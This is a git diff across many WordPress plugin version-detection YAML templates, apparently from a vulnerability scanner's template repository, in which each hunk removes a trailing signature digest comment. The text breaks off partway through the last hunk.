a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 53c6599a08..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b7c04299f8f31ee48bd0ae276edfc7c7748eb77d64fcfd4ef689fccd958806bd022100d2a6c92b53dd6ff80cb59a6d414d6518507f13665c51931bc238321bcae0b45d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 160bf0e0b6..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a11c1d89b43c485c9abdeec4b39cab9e63dca4ed38c196f6c5f663993e87d0a3022049e5f120ea12ea2db890ed34c67c68cf7b050367993b4bdedcdb5c2ce5e5bd93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 250922582d..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009384031e28ea03ec895f19bee5d0b381f314ad1658faac0bdd0f9ac7bf58c6fb02202a6b7f7c023039e049946b07956ea4f95bc32997e504573f32d7f88ff8f835f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 7f007a1030..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202978f58920f4880cf2fa996c714076b6c0595f01118d35aa8d8b34074940afb102202946f9b0da0a0c4158c072fc39a35edd431708fa620bffae69ad01462a7a9c04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 9b156487ef..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d812ce1f0487545586c941d0e4592d2700c0123cf3a23addf687b3bfeff31c660221008d327540b8eeb92702e3f6836d5a9812a33146e0d241d88cc0fb3634dedcefc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 1dcc8e48c5..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202501b2fddc389968974121792af4046c8605290860fd017423b3169579647536022100cf02be0522decb823e13f3c13d1ee07f24e0bfa0659c4e0819e32ccd238b56df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index b560c4e7b9..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022022c9b775f8a9e250430689756ad70c2aae466bc9dc0cab3ff7a31e7398d97679022008f90d6166bb6806aabe0eaf0aaecff8400e311b76799d15e4edde1d7ea0fa56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 04c7972209..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f58faba75ab8abd1676ffe3ca5d3bf478085ae07d7f5c74d1467fcaff0debecb02200b516a279c8d2181452098cbe8f2595f95844cd1685e03def086d3c181854dae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b7a684c21f..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e5f0c54ddb734aa4c8f80f475f86186efd0c78a5790d1052ba4ac63000fe908102200de88979120b8ac2f1d9cd78ec5d7bf47bad59d9fb2c4a14eb5ef869f607b830:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 14f56a98b1..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210082c68fb6cd8a58b791f19fc2a5cdb275cfc60c22018b3535669cdc8b01972af802200aa068b3c2044e0c7199058b2c94e41236a3ea819c7dfc0beeafd23febcec64d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index c09ec7c792..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a0134ca28b0218cb84ca7222b27a17431b12b84af082bc3936241bb117a54cbb022100be4b0a89e81715a5788a1502f60395d374382b521a4831405bb6d411db524c33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 75be82b58e..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cc2312e03d181f14d508f3be562c6718f54ddfcbe69eaae9b9763c3244fe28b4022100aa53edbba4bbe6f5fe81cacf89c7442d1e280d057212fd1f5ac8bdb5c43f7412:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 3ed71c8ca7..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009ead156695e52fccc8360f645aab415051888334f6bfea8864d82ae471606b6b0221008056e4035c6655d6f020c281f2b794658fde070a9e8d3a2b8c4d730ebfbb7765:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 7cbaf56861..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022010e6d4b7e39a3d73ef8d9c33cf025ac166993d7949e35f177da924145c4a92e6022037087786a58d742b4835f5b527868e6bf515758ba17d22795e5ce7eb584ec0e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index bd1bc5edfb..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e5113415a46a4f7542c8514a528327925de06a18e5bcc6bfab75ecdb46afe0a02203a7388ae6c728a6c82daf0fcc037490c49e05bf048875ebc2c5149287dacd943:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 37b5c4f41f..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100de894689ecf7e0adeda0fc58c6e577c433d9bce77f19dd64787f1be3a53e6fde022100d7c348f7a686bd681a9bca6fcef4427c2172b92159789c1419684f14bffb4cdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index d08327c188..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b80f7f1087cfb435a2f870fcbb8ff567ebc20bfe55f0e262de212b3822661e2d02210081e4f1a5aea4cbbbf87e6ed15595e0f1daadce930b7990d4a9d2745791cd16da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index c0418b3655..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ee69b9d7aa0c92c5c0aac6c2e9162960d719df928a5ae1428f4650ef6d22b398022074c3cb53a9af8513c52d93351943b62ded5db2363fe2de10105c43e038bc53cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index e9ae126518..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207f951a5d6b65877732ed44b32b3262f8b4082305a22504e34878de4392eca57e0220168b359c2b02c22920c547f9848d0333c2d95412a9f52d5f64e0e6d7daefe9d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 0eaa56a1ac..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e22760e7f6b8822fc506b5cd3b7665571c959f083d678d62f6112ec236c851d90220630e107646612566e025e86cf402cad80e6d9db79e6780defd30b64ea5f475c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e945815cf8..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f8f628ec8837168a49cdf4ce991d16a7008875fa37a196d3ef508d216bafba4102201e51d53fa368f092b8d0dbb6231e2f1fc067785335b46dcdbce2a4473f325aa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 8e8ac252ae..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b0d7cc56c15ad5a74a3d2d2a80245a66560af761a42050369413798bfd0c296a02200a9bd878bc5c1344b00d47a432625545a1c28eb2f52b8802b915f1493f2fef2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index ab56f99510..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210095efa1675eee8fd1fd96fef05622003988f5e7aec4f7ec74a519c3ab3d930f87022033ff302fd5e3ff94b5b708ac72e3d3776bd52081556cc4437c04aeb71941c907:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 73ba0f9c4f..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206d0c8f9c29478fd09b9dd3011f9192cc810df7cc16e07c6fcde29c6a038c8008022100fea2ce34df7e7261b0861a7164a803ff60b45a1c51167de39d56de5a8ebec2f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index acc03c08be..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202ae4c4aa9d796b701c494e2a7d5310ab666a043af75b7cc8bb66edba0586d3c40220364bf67f6f01ba471e9e32fd9095b5f2e1405cdf86a96ab3f4970b2a1f33c1fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 67937c8784..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eba13737add0c30a997e253848e051ab2f306d102e33313125a0a010a963e76802205bc797ba74da602cd30ccc83b131a295e18eeddb7364788e73492f4e9521b3f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index aeb20bde85..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202fd8dd395e7bb66de95d2334617d0544615ab827de56642cc6892b01e14048e002204c8e3aaf9811b3c20d10084c83186dcf4ee4048aa7aa60e022b558c7762570f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 0efc7f9ee4..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220160b6682b377826ca9ece7efd66f2c07e4fab505efa4c0372ce72cb538bfe38c02210087f84f41c308c9e07f49a126759dafd2c8910570a03e63eab7b8d3eb5a42dad9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index f26808b877..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220629dd18dc0290b7176d411ef8a5b8ebaeb3765d43da1b4ee99937e4423cf98b2022042c17ff3fcd7ad4e6d8f422a4f60cb0626b444500ff122b158c630cbe2451c1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 7909a5e0df..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e205b10c25ba20a886c6c704f10e42f5ad7c23f5b5d74104c216200b234ecdb702201e591579a40d1cbc3a936a53c3a1c64925492bc88cda47375fdd0a54eedbd173:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 16f083d789..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205c21d9195f3ad39f5aec5d2c2610aff9274aeb2f9c9bff1e035098040e79c1c8022077489cdeae7b3dd6b40c8e815a1a17c2a6aeff6ad27e28cc5806dbec797f200c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 76dead254b..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022044dac88fe8b80ed7d2ae2ac9a84da4169a9b611982e49a84c5502f9468658757022100b5c654dbe3d5922d2915fd41948afb7ae1ad43d3f143e4e47c5da74e9916032e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 6c73af7a60..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022031d324be011a7de89e3c26b34226756b4811c117364ceedab0861d101ae72b1702210082d4cc08df0452b4ace88a486523a14e8d903dd618486f50ac5a3c372283ccb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 14f757a2ae..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f9d09a93b42a78cb5802ba2fc120294ce3b4ef1911c3bef49cf6cdcde58c7e2702205d5fea417c49d40989a6919b79c69abf677e5d8168885aa74ebd41d2703a8514:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 9be873adb7..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009dfd956d212d56716d13cf578beb288167065e867a56f419ba4a9630453247ea0221009c052e87976ae43db86c1b7bd93ca37116cce99227462996a646890006a64c82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index b17e3ae236..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220256391f556aebc34a1462b08e8b2019d267d020adbb82377bbbca8c5299fd99c022100c55e0239ac11c2bea00412d0cd6198cdf7780094f02333927c422f9161c7c94b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index e62e4e750e..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f225217beb13967f579bf5da7dd206abb4f911c683bb3feea0fdcf3cdea7a84102206123db63cb494b13612897f502a988abb43e5e0a62762e4f99b3e16497319d0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 706d6152f5..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203648f66a2615854f9a0c4299552c724113291f08f1f4a57017140fabae24e78d022100a388eecaaa492e4f347ec07a2dff2af83919e46faf963dc6d4b25c5390a89bce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index ae8bbd2e02..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022050a5e9e7afdec74b1d5cc20a2ed09ef8f05bd3f6c334104e5ba9415603b63e4102210089dfd40edd99ff69a10c4b053296e9fbc13b583d996a916e57d0c500166ac3aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 7848baa3a1..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202f97f8d38ed7382c40f0a4bcc85fb16a77c77c8360c74c6acfc3ad4f92b857ae022100820329ec091e07eb875c65c73b4b07fea34b3899a277908ef0f54114eeb0e3ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index b8e77b7bd0..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220021e208c0eb5dbab9016129accbb9ed923c31fbf3bca164e013be20bc0f8fb400221009f11421c0bc96a64f4cfe261e854dfb83a010dfc5aca58a4781f6d16d7ea20ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 93d3ccfc6a..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bba9f2e8f5e07fee54cfecc083a898fad591accde778b6b77834057b1542b540022100c82b8313dfba378c4a6e8e070a5a8ad79625b0b03cf49a046263086bd4d1d6e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 30c72b20ef..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f0bd1ec9f5da6646862b8a07e47d25b509aae45764d4c35a00d3a683ece5df09022029a109ff40ec3c5229ddb6cbf7089cd7ddff6072bafeb49f01d738390d0303c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index c5944d5fb2..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207e42d0f7a55be4f10f2fefe1e25a8be3ce7abd718bb16945e109ee0d02b11607022100a5d1e310cf104ffe91ed89136700288af9ddcfdaa9308589327927f68773d0c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index d2e2c05c95..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009708af4325dbe31693ec27cf3c3e0055849dcf078aed72b26a8b96dc0defb517022100fcb7ab1113aea431bb695f6ee9d07daa8ff2a18b704a2b9b07228887c64ab571:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 8f2678fdf2..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205472a339120027ef7c09d71389d709f7447a08dc0117238cf744e7b8543d281f022100b43a9694b9f5bc7cd15fe49a6f35eb1d07c40f526f911dbeeb3c2d0eaa74ae5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 6e11be02f9..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 